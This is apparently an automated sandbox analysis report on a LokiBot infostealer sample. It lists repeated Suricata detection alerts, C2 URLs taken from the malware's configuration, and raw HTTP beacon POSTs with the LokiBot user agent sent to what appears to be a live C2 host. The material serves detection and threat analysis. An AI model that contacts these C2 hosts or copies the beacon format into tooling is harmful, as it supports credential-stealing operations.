Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49801 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50020 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50020 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50020 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50065 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50065 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50053 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50065 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49890 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50065 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50020 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49890 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49890 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49890 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49760 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49760 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49760 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50044
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50057 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50057 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50057 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49760 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49758
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50057 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49756
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50020
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49890
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50065
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49952
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50006 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49967 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50061 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50006 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49967 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50006 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49967 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50061 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49760
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50061 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50006 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50061 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50060 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50060 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50060 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50063 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50063 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50063 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50060 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49967 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50063 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49917 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49917 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49917 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49917 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50061
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50031 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50031 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50031 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50064 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50064 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50064 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50031 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50064 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49903 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49903 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49903 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49837 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49837 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49837 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49903 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49837 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50062 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50062 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50062 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50055 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50055 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50055 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50055 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49917
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50062 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50058 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50058 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50058 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49837
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50058 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50055
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49928 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49928 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49928 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49982 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49982 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50058
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49928 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49982 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49982 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50066 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50066 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50066 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50066 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50052 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50052 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50052 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49982
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50062
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50052 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50066
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50056 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50056 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50056 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50056 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49967
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50052
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50056
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50054 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50054 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50054 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50054 -> 104.21.64.1:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 104.21.64.1 80

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php

Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1

Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
